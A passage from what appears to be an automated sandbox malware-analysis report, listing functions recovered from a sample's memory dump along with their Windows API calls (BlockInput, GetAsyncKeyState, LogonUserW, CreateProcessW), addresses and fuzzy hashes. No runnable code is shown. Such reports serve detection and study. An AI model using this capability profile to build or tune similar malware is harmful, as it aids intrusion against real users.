                                    • Instruction Fuzzy Hash: 8DF0C435104109EF8F19DF95EC449B93BAAFB08364B048115FA159B6A1DB72E8A0EB90
                                    Function 0019EC7C Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                      • Part of subcall function 0014B63C: GetCursorPos.USER32(000000FF), ref: 0014B64F
                                      • Part of subcall function 0014B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0014B66C
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000001), ref: 0014B691
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000002), ref: 0014B69F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,001AE514,?,?,?,?,?,00000001,?), ref: 0019ECCA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                    • String ID:
                                    • API String ID: 2356834413-0
                                    • Opcode ID: 6ea0d6d7a9a96979986a46d8bfcb821e75addcba0451ab581c3e677aa25d37cf
                                    • Instruction ID: 47e27563c90041c4ff8711dbe095a4aad8d7029ee74fc9ebef9b2610b4a21e43
                                    • Opcode Fuzzy Hash: 6ea0d6d7a9a96979986a46d8bfcb821e75addcba0451ab581c3e677aa25d37cf
                                    • Instruction Fuzzy Hash: FDF0A730200228FBDF189F05DC06EBE3BA5EB00760F004415F9451A2A1C7B598B0DBD0
                                    Function 0014AAFC Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 0014AB45
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: d87b3f7fd28392d823b65b11f94f2cac89a46ede28e7e4c0b9a610353bb34ab6
                                    • Instruction ID: 363d7effc0abb59335bee3190e959a6754c443ff606c1608ae569b3e0ed99dd6
                                    • Opcode Fuzzy Hash: d87b3f7fd28392d823b65b11f94f2cac89a46ede28e7e4c0b9a610353bb34ab6
                                    • Instruction Fuzzy Hash: 92F05834600209EFDB289F09EC55A793BA6FB44360F054229F9128B6B0E7B2D8A0DB50
                                    Function 00186AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 00186ACA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: 1ab8af3451f513712371ca045d1c8af5c37dd920934815be3a2d6bbcd0a8150c
                                    • Instruction ID: b712958fe156373d98cd45799c96d7c2b2918a11743e36d611843745ce940bcd
                                    • Opcode Fuzzy Hash: 1ab8af3451f513712371ca045d1c8af5c37dd920934815be3a2d6bbcd0a8150c
                                    • Instruction Fuzzy Hash: 66E048356002046FC704EF59E405D56B7ECAF74751F04C416F945D7251DBB0F8448BA0
                                    Function 001774BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001774DE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID:
                                    • API String ID: 2434400541-0
                                    • Opcode ID: 58577358b2e88fd7bdd822fa2f2a5313b2ccdb923249ae39016d1051ecc80dba
                                    • Instruction ID: 3ed416d7a3a0cef37d526d9390f45e58228b5585b62e60354312c53a80659a6e
                                    • Opcode Fuzzy Hash: 58577358b2e88fd7bdd822fa2f2a5313b2ccdb923249ae39016d1051ecc80dba
                                    • Instruction Fuzzy Hash: 58D09EA556C70579ED3D07249C1FF761968F3007C5F95D2C9B68BC94C1BB9058859132
                                    Function 0019F609 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0019F649
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 60266e06be8d94022939c6b181c1f315adb0e9a7477376642b90fab4b0babb5e
                                    • Instruction ID: 79e5afb659e07eb3052800d1750d73c34a4e5f3532299b7dae875b1e8ba5b51e
                                    • Opcode Fuzzy Hash: 60266e06be8d94022939c6b181c1f315adb0e9a7477376642b90fab4b0babb5e
                                    • Instruction Fuzzy Hash: 98F06D31201389BFDF21DF58DC15FD67BA9EB16720F144008BA11672E1CBB07860DB60
                                    Function 0014AB4F Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0014AB7D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 6f9376d251e78f53df94e765bf83fa6d90663ee93c3f09bf3409deaec3db1fe4
                                    • Instruction ID: f1ad284dca1ee51a0dc01b863ada910e9aba991b84c6aed4cc47fc4923fc6f90
                                    • Opcode Fuzzy Hash: 6f9376d251e78f53df94e765bf83fa6d90663ee93c3f09bf3409deaec3db1fe4
                                    • Instruction Fuzzy Hash: 3BE01235644208FBCF19AF91DC51E683B2AFF58324F104058FA055B6B1CB77A562DB50
                                    Function 0016B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                    Download Yara Rule
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0016AD3E), ref: 0016B124
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    • Opcode ID: a4057525ea25ac825795a9765e39b26a9ff4193518742efe9f0b4b02f067b1cc
                                    • Instruction ID: 18010eee13d07bc94c43d9e18d0c68b967253c3fce91405bc6866b7e2d75a700
                                    • Opcode Fuzzy Hash: a4057525ea25ac825795a9765e39b26a9ff4193518742efe9f0b4b02f067b1cc
                                    • Instruction Fuzzy Hash: EBD05E320A460EAEDF025FA4EC02EAE3F6AEB04700F408110FA11C50A0C771D531AB50
                                    Function 0019F654 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,001AE4D1,?,?,?,?,?,?), ref: 0019F67F
                                      • Part of subcall function 0019E32E: _memset.LIBCMT ref: 0019E33D
                                      • Part of subcall function 0019E32E: _memset.LIBCMT ref: 0019E34C
                                      • Part of subcall function 0019E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001F3D00,001F3D44), ref: 0019E37B
                                      • Part of subcall function 0019E32E: CloseHandle.KERNEL32 ref: 0019E38D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                    • String ID:
                                    • API String ID: 2364484715-0
                                    • Opcode ID: ef74a6a96570d1643195f527ccc84e2ea94da6766a58e6a94e0c28aacd2958b1
                                    • Instruction ID: 1eac593acb1e0101c843c8406c16e2065b693e6d013631bda3a6e5f49dbd6ed1
                                    • Opcode Fuzzy Hash: ef74a6a96570d1643195f527ccc84e2ea94da6766a58e6a94e0c28aacd2958b1
                                    • Instruction Fuzzy Hash: 95E01232100209EFCB01DF04EC05E9937B5EB08324F024118BA00872B1D731A9A1EF41
                                    Function 0019F5AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 0019F5D0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 8bb9a4c04d6339b89dceab67c88dc78deec2a951051dc76d172e8f138579433c
                                    • Instruction ID: 5c7dcefbec572b365ed41d2e934b736469b31e172b3c087a2418dbac2725786d
                                    • Opcode Fuzzy Hash: 8bb9a4c04d6339b89dceab67c88dc78deec2a951051dc76d172e8f138579433c
                                    • Instruction Fuzzy Hash: 48E0177420420DEFCB01DF84EC44E963BA5EB19320F010054FD048B361D771A870DB61
                                    Function 0019F5DA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 0019F5FF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: b305fe5521b2f095e648fb091d99e18c55a33d0c1816b55752cdd442d2a97a72
                                    • Instruction ID: bc5a490fae1082bc0101b4088392e19ebe604b47398e9fa57acf7e6a7e85a224
                                    • Opcode Fuzzy Hash: b305fe5521b2f095e648fb091d99e18c55a33d0c1816b55752cdd442d2a97a72
                                    • Instruction Fuzzy Hash: 40E0177420020DEFCB01DF84EC44E963BA5FB19320F010054FD048B362C772A8B0EBA1
                                    Function 0014B715 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                      • Part of subcall function 0014B73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0014B72B), ref: 0014B7F6
                                      • Part of subcall function 0014B73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0014B72B,00000000,?,?,0014B2EF,?,?), ref: 0014B88D
                                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0014B2EF,?,?), ref: 0014B734
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                    • String ID:
                                    • API String ID: 2797419724-0
                                    • Opcode ID: 35b4390590d67aa556c5dfa8ecf801c37e0a767c8d61910f8414597c4f306861
                                    • Instruction ID: a0063e9cd60eff2ee4418139dffdfe47723e21a139ff1938e0e13642564910df
                                    • Opcode Fuzzy Hash: 35b4390590d67aa556c5dfa8ecf801c37e0a767c8d61910f8414597c4f306861
                                    • Instruction Fuzzy Hash: 92D0123014430CB7DB142F51EE47F593A1E9B60750F004420B704691E1CBB5A4509564
                                    Function 001AB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: ea90259b5323c82cc558c1ba212cd52f2cce795117a84ca244bddd705a0ed4dd
                                    • Instruction ID: 930e846ead3398aad2b763b7ee5523f13ed2fbafe62d2ba9f572d9a4d1a6b3d9
                                    • Opcode Fuzzy Hash: ea90259b5323c82cc558c1ba212cd52f2cce795117a84ca244bddd705a0ed4dd
                                    • Instruction Fuzzy Hash: 14C04CB5400109DFD755DFD1D9449EEB7BCAB04301F104191A105F1110D7709B859B72
                                    Function 00158189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0015818F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 59cb5b3583fd844203a1299e4f054af6a7cc4012a6d9e49a0f2758e010cf4e72
                                    • Instruction ID: 9a502eef35469102a7d7c3707c3dbce71d7103a9aca4997e9de0ce579223b59b
                                    • Opcode Fuzzy Hash: 59cb5b3583fd844203a1299e4f054af6a7cc4012a6d9e49a0f2758e010cf4e72
                                    • Instruction Fuzzy Hash: BBA0223000020CFBCF002F82FC0A8883FACFB002A0B000030F80C00832EB33A8A08BC2
                                    Function 00143200 Relevance: 1.0, Instructions: 986COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID:
                                    • API String ID: 3964851224-0
                                    • Opcode ID: aa572c641ea7d6e231d9831452b8240b67a6bda381954ee30608a07a71582212
                                    • Instruction ID: 697ace63922b3a395484ef460a35158b6833b656f5aaac1eeb86c16343b816a4
                                    • Opcode Fuzzy Hash: aa572c641ea7d6e231d9831452b8240b67a6bda381954ee30608a07a71582212
                                    • Instruction Fuzzy Hash: 0A9278746083419FD724DF18C480B6ABBE1FF99304F14885DE99A8B3A2D771ED85CB92
                                    Function 0013E3B0 Relevance: .5, Instructions: 540COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 30c8428d552c2c63eeef9f4df9a3ffe301287c344cafd481c0ee36cd624ced42
                                    • Instruction ID: bfe6f60b246c70c69d38dd8c47eff9d9f484c00747f761f9a33d804cacf39431
                                    • Opcode Fuzzy Hash: 30c8428d552c2c63eeef9f4df9a3ffe301287c344cafd481c0ee36cd624ced42
                                    • Instruction Fuzzy Hash: 51229EB4A04205DFDB24DF58C491ABAB7F0FF18314F188169E94AAB391E731AD85CB91
                                    Function 001393F0 Relevance: .5, Instructions: 531COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
